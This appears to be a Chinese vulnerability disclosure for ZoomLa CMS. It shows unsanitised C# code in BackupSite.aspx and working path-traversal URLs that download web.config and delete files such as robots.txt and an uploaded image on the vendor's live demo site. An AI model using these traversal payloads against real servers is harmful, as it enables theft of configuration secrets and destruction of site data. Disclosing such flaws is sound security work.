### 简要描述:
逐浪最新版 任意文件删除 任意文件下载
### 详细说明:
在此请求逐浪cms 重视每个白帽子提交的漏洞 不要老是漏洞忽略
地址
```
http://demo.zoomla.cn/USER/Develop%5CSiteAdmin/BackupSite.aspx
```
源码如下
```
protected void Page_Load(object sender, EventArgs e)
{
this.M_U = this.B_U.GetLogin();
if (base.Request.QueryString["status"] == "del") //任意文件删除
{
this.del(base.Request.QueryString["name"].ToString());
}
if (base.Request.QueryString["status"] == "down") //任意文件下载
{
this.down(base.Request.QueryString["name"].ToString());
}
this.GetBakFileList();
}
```
我们先看下任意文件下载
```
public void down(string name)
{
base.Response.Clear();
base.Response.ClearContent();
base.Response.ClearHeaders();
base.Response.AddHeader("Content-Transfer-Encoding", "binary");
base.Response.ContentType = "application/octet-stream";
base.Response.ContentEncoding = Encoding.GetEncoding("gb2312");
string filename = base.Server.MapPath("/Dev/bak/" + this.M_U.UserID.ToString() + "/" + name); //没处理
base.Response.WriteFile(filename);
base.Response.Flush();
base.Response.End();
}
```
漏洞证明 访问
```
demo.zoomla.cn/USER/Develop\SiteAdmin/BackupSite.aspx?status=down&name=../../../web.config
```
[<img src="https://images.seebug.org/upload/201408/061245346e104197756f87bcc0d72c2522f0f50b.png" alt="83.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/061245346e104197756f87bcc0d72c2522f0f50b.png)
打开文件查看内容
```
<?xml version="1.0"?>
<!--
注意: 除了手动编辑此文件以外,您还可以使用
Web 管理工具来配置应用程序的设置。可以使用 Visual Studio 中的
“网站”->“Asp.Net 配置”选项。
设置和注释的完整列表在
machine.config.comments 中,该文件通常位于
\Windows\Microsoft.Net\Framework\v2.x\Config 中
-->
<configuration>
<configSections>
<sectionGroup name="system.web">
<!--<section name="neatUpload" type="Brettle.Web.NeatUpload.ConfigSectionHandler, Brettle.Web.NeatUpload" allowLocation="true"/>-->
</sectionGroup>
<section name="RewriterConfig" type="URLRewriter.Config.RewriterConfigSerializerSectionHandler, URLRewriter"/>
</configSections>
<appSettings configSource="Config\AppSettings.config"/>
<RewriterConfig configSource="Config\URLRewrite.config"/>
<connectionStrings configSource="Config\ConnectionStrings.config"/>
<system.web>
<sessionState mode="InProc" stateConnectionString="tcpip=127.0.0.1:42424" sqlConnectionString="data source=127.0.0.1;Trusted_Connection=yes" cookieless="false" timeout="20"/>
<!--<identity impersonate="true" userName="administrator" password="password" />-->
<!--Ajax支持-->
<httpHandlers>
<add verb="*" path="*.flv" type="ZoomLa.NoLink"/>
<!--<add verb="*" path="*.aspx" type="URLRewriter.RewriterFactoryHandler,URLRewriter"/>-->
<!--经典模式使用-->
<!--<add verb="*" path="Images/*.jpg" type="UploadHandler"/>-->
</httpHandlers>
<!--end-->
<compilation debug="false" targetFramework="4.0">
<assemblies>
<add assembly="Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>
<add assembly="System.Design, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>
<add assembly="System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>
<add assembly="Accessibility, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>
<add assembly="System.Data.OracleClient, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
<add assembly="System.Messaging, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>
<add assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
<add assembly="System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>
<add assembly="System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>
<add assembly="System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>
<add assembly="System.DirectoryServices.Protocols, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>
<add assembly="System.DirectoryServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>
</assemblies>
</compilation>
<!--<neatUpload useHttpModule="True" maxNormalRequestLength="1048576" maxRequestLength="2097151" defaultProvider="FilesystemUploadStorageProvider">
<httpRuntime requestValidationMode="2.0" maxRequestLength="512000" appRequestQueueLimit="1000" useFullyQualifiedRedirectUrl="true" executionTimeout="3600"/>
<providers>
<add name="FilesystemUploadStorageProvider" type="Brettle.Web.NeatUpload.FilesystemUploadStorageProvider, Brettle.Web.NeatUpload"/>
</providers>
</neatUpload>-->
<!--通过 <authentication> 节可以配置 ASP.NET 使用的 安全身份验证模式,以标识传入的用户。-->
<!--
如果在执行请求的过程中出现未处理的错误,则通过 <customErrors> 节可以配置相应的处理步骤。
具体说来,开发人员通过该节可以配置要显示的 html 错误页以代替错误堆栈跟踪。RemoteOnly
-->
<customErrors mode="Off" defaultRedirect="~/Prompt/GenericError.htm">
<error statusCode="403" redirect="~/Prompt/NoAccess.htm"/>
<error statusCode="404" redirect="~/Prompt/FileNotFound.htm"/>
<error statusCode="500" redirect="~/Prompt/GenericError.htm"/>
</customErrors>
<!--添加、移除或清除应用程序中的 HTTP 模块。-->
<httpModules>
<!--<add name="UploadHttpModule" type="Brettle.Web.NeatUpload.UploadHttpModule, Brettle.Web.NeatUpload"/>-->
<add name="IPModule" type="ZoomLa.Web.HttpModule.IPHttpModule, ZoomLa.Web"/>
<!--<ADD NAME="MODULEREWRITER" TYPE="URLREWRITER.MODULEREWRITER, URLREWRITER"/>-->
<!--<add name="StrConvHttpModule" type="ZoomLa.HttpModules.StrConvHttpModule, StrConvHttpModule"/>-->
</httpModules>
<!--<httpRuntime maxRequestLength="2097151" executionTimeout="3600" useFullyQualifiedRedirectUrl="true"/>-->
<httpRuntime requestValidationMode="2.0" maxRequestLength="512000" appRequestQueueLimit="1000" useFullyQualifiedRedirectUrl="true" executionTimeout="3600"/>
<pages configSource="Config\Pages.config"/>
</system.web>
<system.webServer>
<validation validateIntegratedModeConfiguration="false"/>
<modules runAllManagedModulesForAllRequests="true">
<!--<add name="StrConvHttpModule" type="ZoomLa.HttpModules.StrConvHttpModule, StrConvHttpModule"/>-->
<add name="IPModule" type="ZoomLa.Web.HttpModule.IPHttpModule, ZoomLa.Web"/>
</modules>
<handlers>
<add name="UrlHandles" path="*.aspx" verb="*" type="URLRewriter.RewriterFactoryHandler,URLRewriter" preCondition="integratedMode"/>
<!--集成模式-->
<add name="Zoomla" path="*.net" verb="*" modules="IsapiModule" scriptProcessor="C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_isapi.dll" resourceType="Unspecified" preCondition="classicMode,runtimeVersionv2.0,bitness32"/>
</handlers>
<defaultDocument>
<files>
<remove value="default.aspx"/>
<add value="Default.aspx"/>
</files>
</defaultDocument>
</system.webServer>
</configuration>
```
可下载其他内容的
接着我们看下任意文件删除
```
protected void del(string name)
{
FileSystemObject.Delete(base.Server.MapPath("/Dev/bak/" + this.M_U.UserID.ToString() + "/" + name), FsoMethod.File);
}
```
```
public static void Delete(string file, FsoMethod method)
{
if ((method == FsoMethod.File) && File.Exists(file))
{
File.Delete(file);
}
if ((method == FsoMethod.Folder) && Directory.Exists(file))
{
Directory.Delete(file, true);
}
}
```
漏洞证明
我还是本地进行测试好点
先访问
```
http://demo.zoomla.cn/robots.txt
```
[<img src="https://images.seebug.org/upload/201408/06130122ebe13a5016122794f4a5209b738dc0c6.png" alt="84.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/06130122ebe13a5016122794f4a5209b738dc0c6.png)
文件是存在的
等下我访问
```
http://demo.zoomla.cn/USER/Develop/SiteAdmin/BackupSite.aspx?status=del&name=../../../robots.txt
```
在访问
```
http://demo.zoomla.cn/robots.txt
```
[<img src="https://images.seebug.org/upload/201408/06130205657324f731d70cba3136903c19eb6e0a.png" alt="86.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/06130205657324f731d70cba3136903c19eb6e0a.png)
不在了
访问
```
http://demo.zoomla.cn/UploadFiles/3D/200912/200912111913258191.jpg
```
[<img src="https://images.seebug.org/upload/201408/06130455badd4bb6e6304ccae09f363e3af57c06.png" alt="85.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/06130455badd4bb6e6304ccae09f363e3af57c06.png)
是存在的
然后访问
```
http://demo.zoomla.cn/USER/Develop/SiteAdmin/BackupSite.aspx?status=del&name=../../../UploadFiles/3D/200912/200912111913258191.jpg
```
[<img src="https://images.seebug.org/upload/201408/061303423096cd74a0bdca1ee9829cac4191c819.png" alt="88.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/061303423096cd74a0bdca1ee9829cac4191c819.png)
### 漏洞证明:
漏洞证明如上
暂无评论